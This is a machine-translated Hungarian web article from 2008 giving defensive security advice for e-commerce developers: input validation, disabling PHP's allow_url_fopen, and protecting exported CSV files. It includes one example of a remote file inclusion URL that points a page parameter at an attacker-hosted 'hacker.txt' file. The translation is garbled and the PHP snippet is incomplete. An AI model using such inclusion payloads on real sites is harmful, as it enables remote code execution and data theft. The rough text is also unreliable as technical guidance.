The following content has been automatically translated by close 
E-Commerce Biztonság - dugulás a biztonsági réseket | A-kereskedelmi cikk
Cikk Sphere Logo

E-Commerce Biztonság - dugulás a biztonsági lyukak

Szakértői Szerző: Paul Roberts | cikk Absztrakt
Szavak száma: 520 szavak | Views: 135 néző (k)
Biztonság egy e-kereskedelmi webhely kell nagy figyelmet kidolgozása során az e-kereskedelmi webhely vagy szoftver. A fejlesztő tisztában kell lennie az összes biztonsági megfontolások a tervezés során a telephely. Az e-kereskedelem egyre gyakoribbá válik ezekben a napokban, a biztonsági támadások száma biztosan nő. Paranoia van egy egészséges dolog az e-kereskedelmi webhely fejlesztőknek, meg kell tartani a lépést a kapu biztonsági kérdéseket, és tartsa meg fülünket, és nyitva a szemét. Bár a következő komoly hiányosságok vannak, a következő kiskapuk ha jelen vannak könnyedén meg.

Alább felsorolt néhány biztonsági megfontolások során figyelembe vehető fejlesztő oldalon. Ez a cikk nem terjed ki az e-lopás, kérjük, az én külön cikket ezzel kapcsolatban.

Felhasználói - minden bemenet, függetlenül attól, hogy belépnek egy mennyiség, keres egy terméket, belépés egy nevet stb kell érvényesíteni a gyanús karakter. Ha ez nem történik meg, akkor lehet belépni "?>", záró zárócímkéket PHP és végre egy PHP kódot.

Sokkal biztonságosabb lehetővé számokat és karaktereket az (nyomtatott betűvel szerepel) és a 0-9, és semmi mást, ahelyett, hogy az összes karakter, hogy nem kell ott. Az érvényesítési parancsfájl kell lapozni minden karaktert egyenként. Ezt úgy kell megvalósítani használ szerver oldali validálás, nem Javascript. Használó szerver oldali beviteli ellenőrzés elengedhetetlen távol tartani a nem kívánt karakter

Létezik egy másik fontos végrehajtásakor a PHP kódot. Ha a PHP-beállítás van egy úgynevezett allow_url_fopen amely lehetővé teszi a fájlok megnyitása egy PHP szkriptet. Ez a beállítás meg kell szakítani, kivéve, ha feltétlenül szükséges.

Képzeljük csak el, sikerült a PHP szkripteket mind fix fejléc és lábléc, és hozzáférnek a weboldalak beírni a http://www.mysite.com/index.php?page=page2. Kész is van egy rosszindulatú felhasználó egyik szkript módosítja ezeket a paramétereket beírja a "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt"-val Néhány PHP kódot a fájlban "hacker.txt". Lehetne bármi megtörténhet, a PHP fájlokat olvasni, törölni, fontos információkat lopott.

Ha nem biztos benne, hogy ez a beállítás be-vagy kikapcsolása, másolja a következő PHP kódot egy szöveges fájlt, és töltse fel a webszervert:

phpinfo ();
?>

Ha a szkript elérheti a webszerverre, akkor találkozik a beállítást allow_url_fopen alatt alakzat.

A számítógép-felhasználó, normál körülmények között nem találja az értékét ezt a beállítást.

Legyen óvatos az exportált adatokat, mint a megrendelések, a termékek és a MySQL CSV fájlokat. Ha ez az adat abból a forgatókönyvet, és tartanak a webszerveren, egy közös, azaz a fájl nevét. http://www.mysite.com/admin/output_tables.csv. Ez csak akkor igazán probléma, amikor az exportált adatok lakik egy fájlt egy olyan könyvtárba, a nyilvánosság számára hozzáférhetővé. Van két lehetőség, hogy ezt a biztonsági joghézag - Először is a kimeneti fájl mögött egy jelszóval védett könyvtárba, másrészt hogy az adatok belül található egy HTML form textarea elem forgatókönyvet. A storeowner lehet majd másolja az adatokat a fájlból, és hozzon létre egy új fájlt a számítógépen és illessze be az információ itt.

Már kész is van egy hacker megtalálni a fájlnevet ellenőrzésével ki az e-kereskedelmi szoftver demo honlapján, és keresse meg ugyanazt a fájlnevet egy igazi oldalon.
: Paul Roberts -

About the Author / Author Bio

: Paul Roberts -
ÉN fuss egy szoftverfejlesztő cég szakosodott E-Commerce, Search Engine Optimization, és Nyomtatási becslése szoftver hívott ROBO Design Solutions. Én is kialakulhat, új-zélandi e-kereskedelmi megoldások és szoftverek néven ROBO Design.

Article Source: http://www.hu.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 135 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
How to Keep Your Computer Secure
Hogyan viselkedni Ellenőriz biztonsági beállításai a Windows Vista

More "Elektronikus kereskedelem" Kapcsolódó cikkek

Alább felsorolt több cikk kapcsolódik a fenti cikk az "e-kereskedelmi" cikk kategóriában.

Iránt érdeklődők, a fenti cikkben az "E-Commerce Biztonság - dugulás a biztonsági lyukak" szintén érdeklődnek a kapcsolódó cikkek közül az alábbi:

Futás egy e-kereskedelmi vállalkozás nem csak arról szól, tartsa website felállt és működik. Ügyfél használja az Ön tud tenni őket telefonon, faxon, e-mail, vagy más módon, és ez megköveteli az összes rendszereket kell azon dolgozik, hogy meg tudja valósítani ügyfél kéri.
Csak egy pár napig vissza én volt egy beszélgetés a barátommal. Ben ünnepli a baba 1. születésnapját, és el kellett futtatni közt őshonos Kerala és Chennai, a munkahely. Ő és a jobb fele utazott között ezeken a helyeken legalább 4-szer Az elmúlt egy hónap.
Ha már ezzel az e-kereskedelem minden időt, ha tudta volna, hogy több, mint a valódi scamers szolgáltatók nagykereskedelmi dropship címtár szolgáltatások. A világon az e-business, Salehoo világszinten Márkák egyaránt elismert szolgáltatók népszerűségre tettek szert az elmúlt néhány évben.
Ha valaha is egy online kiskereskedő, akkor valószínűleg már hallott Salehoo, vagy akár használt, hogy az Ön javára. Ha csak a kezdő ki üzleti, akkor lehet összetéveszteni a vegyes Salehoo értékelések odakint. Nos, vessünk egy pillantást, mi Salehoo igazán szól, és az általuk nyújtott szolgáltatásokkal, amit sok hajlamosak figyelmen kívül hagyni.
Hány ember tudja, hogy vásárolt valamit az interneten? Ha az Ön, mint én, elég sok, ezért e-kereskedelem a világ új online shopping mall. De ki fut, ezek az online kiskereskedelmi üzletben is? Az emberek mint te meg én, ezért ezt az üzletet is fellendülőben van, és tovább virágzik most és a jövőben egyaránt.
Ha Ön egy nagy rajongója a legújabb elektronikai termékek, akkor hajlamosak lehetnek a gondolat futó saját elektronikai vállalkozás online. Ez nem olyan nehéz elkezdeni, ha megteszik a teljes mértékben használják ki a jobb csepp hajózási elektronikai szolgáltatás, és vannak elég neked közül lehet választani.
Gondoltál-e valaha bemegy a helyi kényelmes tárolására és vajon mi lenne, ha a tulajdonosa, mint ez? Szeretne egy jó tulajdonos, majd az emberek, mint te? Nos ezt a cikket megmutatja előnyeit birtokló saját online kiskereskedelmi, vagy ismertebb nevén e-kereskedelem, melyek eltérnek a valódi kényelmet helyi boltban.
Cikk Directory Home Minden kategória Internet és az E-Business E-kereskedelem

Nem találja, amit keres? Próbálja ki a Google Search!
Copyright © 2005 -- a Larry Lim, Szingapúr - Article Search Engine Directory-at ArticleSphere.com ™
Minden jog fenntartva világszerte. Minden védjegy és szolgáltatásneve tulajdonát képezik, az érintett tulajdonosok.

Afrikaans Albán Arab Belorusz Bolgár Katalán Kínai (egyszerűsített) Kínai (hagyományos) Horvát Cseh Dán Német Angol Észt Filippínó Finn Francia Galíciai Görög Héber Hindi Magyar Izlandi Indonéz Írországi Italiano Japán Koreai Lett Litván Macedón Maláj Máltai Holland Norvég Perzsa Lengyel Portugál Román Orosz Szerb Szlovák Szlovén Spanyol Szuahéli Svéd Thaiföldi Török Ukrán Vietnámi Walesi Jiddis